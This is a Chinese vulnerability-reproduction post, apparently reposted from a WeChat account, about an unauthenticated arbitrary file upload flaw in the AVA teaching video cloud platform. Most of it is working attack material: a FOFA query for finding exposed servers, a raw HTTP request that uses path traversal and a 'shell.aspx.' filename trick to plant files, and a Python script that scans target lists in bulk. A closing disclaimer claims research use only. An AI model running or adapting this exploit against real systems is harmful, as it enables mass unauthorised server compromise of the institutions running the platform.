奥威亚教学视频应用云平台 UploadFile.aspx 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
FOFA:
body="/Upload/DomainInfo/MaxAVALogo.png"
POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje------sajhdjqwjejqwbejhqwbjebqwhjeContent-Disposition: form-data; name="file"; filename="shell.aspx."Content-Type: image/jpeg123------sajhdjqwjejqwbejhqwbjebqwhje-
访问http://ip/shell.aspx
# encoding:utf-8
import uuid
import requests
import argparse
import ssl
import urllib3
import re
import time
import os
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。
ssl._create_default_https_context = ssl._create_unverified_context
# urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 设置打印颜色
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'
def check_vuln(url):
url = url.strip("/")
target_url = url + "/Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Content-Type': 'multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje'
}
unique_filename = f"{uuid.uuid4()}.aspx"
data = f"""------sajhdjqwjejqwbejhqwbjebqwhje\r
Content-Disposition: form-data; name="file"; filename="{unique_filename}.aspx."\r
Content-Type: image/jpeg\r
\r
123\r
------sajhdjqwjejqwbejhqwbjebqwhje--"""
upload_url = url + f"/{unique_filename}"
try:
response = requests.post(target_url, headers=headers, data=data, verify=False, timeout=20)
if response.status_code == 200 and "Success" in response.text:
print(f"{RED}[+] {url} 存在漏洞,漏洞地址为{upload_url}{RESET}")
return True
except requests.exceptions.RequestException as e:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="目标URL")
parser.add_argument("-f", "--file", help="目标文件")
args = parser.parse_args()
if args.url:
args.url = "http://" + args.url.strip("/") if not args.url.startswith(("http://", "https://")) else args.url
check_vuln(args.url)
elif args.file:
with open(args.file, "r") as f:
content = f.read().splitlines()
for url in content:
url = "http://" + url.strip("/") if not url.startswith(("http://", "https://")) else url
check_vuln(url)
else:
print("请输入目标URL或目标文件")
if __name__ == "__main__":
main()
python .AVA-Teaching_video_application_cloud_platform-FileUpload.py -f .2.txtpython .AVA-Teaching_video_application_cloud_platform-FileUpload.py -u 192.168.1.1
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】奥威亚-教学视频应用云平台-任意文件上传漏洞 (附批量验证脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论